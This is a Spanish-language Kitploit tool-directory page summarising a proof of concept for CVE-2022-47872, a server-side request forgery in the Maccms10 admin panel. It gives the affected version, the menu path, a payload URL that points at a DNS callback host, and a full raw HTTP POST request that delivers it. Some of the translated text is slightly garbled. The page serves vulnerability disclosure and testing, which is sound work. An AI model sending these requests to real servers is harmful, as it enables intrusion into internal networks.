Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-47872 — Prueba de concepto para la vulnerabilidad SSRF en el panel de administración de Maccms10, que demuestra la explotación mediante la recopilación de interfaces personalizadas con detalles de solicitudes HTTP. | Kitploit
Herramientas/GitHubGitHub/cedric1314/cve-2022-47872
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubcedric1314/cve-2022-47872

CVE-2022-47872

Prueba de concepto para la vulnerabilidad SSRF en el panel de administración de Maccms10, que demuestra la explotación mediante la recopilación de interfaces personalizadas con detalles de solicitudes HTTP.

Ver Repositorio
hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

#CVE-2022-47872

maccms10 admin+ ataques SSRF

Resumen

Información del sitio web del fabricante:https://maccms.pro

Dirección de descarga del código fuente : https://github.com/maccmspro/maccms10.git

Versión afectada: V2021.1000.2000

图片

2.Detalles de la vulnerabilidad

https://github.com/maccmspro/maccms10/issues/22

Ingrese al panel de administración, haga clic en Recopilar --> Interfaz personalizada --> Dirección de interfaz,

En el cuadro de nombre ingrese payload1:http://7ca8e96e.dns.1433.eu.org.

Puede provocar ataques SSRF.

Nombre de la vulnerabilidad: ataques SSRF

Nivel de vulnerabilidad: Riesgo medio

Ubicación de la vulnerabilidad: haga clic en Recopilar --> Interfaz personalizada --> Dirección de interfaz

3.Vulnerabilidades recurrentes y

POST http://192.168.52.163/admin.php/admin/collect/info.html HTTP/1.1

Host: 192.168.52.163

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0

Accept: /

AcceptLanguage: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding:gzip,deflate

Content-Type: applicat ion/ x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 226

Origin: http://192.168.52.163

Connection: close

Referer: http://192.168.52.163/admin.php/admin/collect/info.html

Cookie: PHPSESSID=gn328q2i2ruajsh96qoll65ia7

collect_id=&token=8d639020c85bde89f9276381d2460046&collect_name=1111&collect_url=http%3A%2F%2F7ca8e96e.dns.1433.eu.org.&collect_param=%26q%3D1&collect_type=1&collect_mid=1&collect_opt=Ø&collect_filter=0&collect_filter_from=

图片

图片

图片

图片

图片

Descargar herramienta